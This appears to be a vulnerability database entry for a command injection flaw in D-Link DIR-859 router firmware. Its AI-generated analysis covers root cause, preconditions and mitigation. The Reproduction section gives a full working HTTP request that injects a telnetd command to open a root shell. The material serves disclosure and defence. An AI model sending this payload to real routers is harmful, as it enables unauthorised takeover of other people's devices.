CVE-2022-46476
Description
D-Link DIR-859 A1 1.05 was discovered to contain a command injection vulnerability via the service= variable in the soapcgi_main function.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
D-Link DIR-859 A1 firmware 1.05 has a command injection vulnerability in soapcgi_main via the service parameter, allowing unauthenticated remote attackers to execute arbitrary commands.
Vulnerability
The command injection vulnerability resides in the soapcgi_main function of the cgibin program in D-Link DIR-859 A1 firmware version 1.05. The service parameter from the request URI is extracted, filtered, and then passed to system() without proper sanitization, allowing injection of arbitrary commands [1].
Exploitation
An unauthenticated attacker can send a crafted HTTP POST request to the /soap.cgi endpoint with a service parameter containing command injection payloads. The reference POC demonstrates injecting &&telnetd -p 8888&& to start a telnet service on port 8888, then connecting to it remotely [1].
Impact
Successful exploitation allows an attacker to execute arbitrary commands with root privileges on the device, leading to full compromise of the router, including data exfiltration, network monitoring, and use as a pivot point [1].
Mitigation
As of the publication date, no official patch has been released by D-Link. Users should consider upgrading to a newer firmware version if available or replacing the device if it reaches end-of-life. The vulnerability is not currently listed in CISA's Known Exploited Vulnerabilities catalog.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 2
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient filtering of the `service=` parameter in `soapcgi_main` allows shell metacharacters to reach `system()`."
Attack vector
An attacker sends a crafted HTTP POST request to `/soap.cgi` with a `service=` query parameter containing shell metacharacters. The PoC shows injecting `&&telnetd -p 8888&&` into the `service` value, which bypasses the weak filter and causes `system()` to execute the injected command [1]. The request must be sent to port 49152 on the router (typically the LAN-side web interface) [1].
Affected code
The vulnerability resides in the `soapcgi_main` function of the `cgibin` program. The `service=` parameter value from the `request_uri` environment variable is extracted into variable `v11`, which is filtered insufficiently before being formatted into `byte_434EF0` and passed to `system()` [1].
What the fix does
No patch is provided in the bundle. The advisory [1] identifies that the filtering applied to the `service=` parameter value (`v11`) is insufficient, allowing shell metacharacters like `&&` to pass through to `system()`. A proper fix would require either sanitizing or rejecting shell metacharacters in the `service` parameter, or avoiding the use of `system()` with user-controlled input entirely.
Preconditions
- network: Attacker must have network access to the router's LAN interface on port 49152
- config: The router must be running D-Link DIR-859 A1 firmware version 1.05
Reproduction
Send the following HTTP POST request to the router at `192.168.0.1:49152`:
```
POST /soap.cgi?service=&&telnetd -p 8888&& HTTP/1.1
Host: localhost:49152
Content-Type: text/xml
Content-Length: 88
SOAPAction: a#b
```
After sending, connect via telnet to `192.168.0.1` on port `8888` to obtain a shell [1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 1
News mentions: 0
No linked articles in our index yet.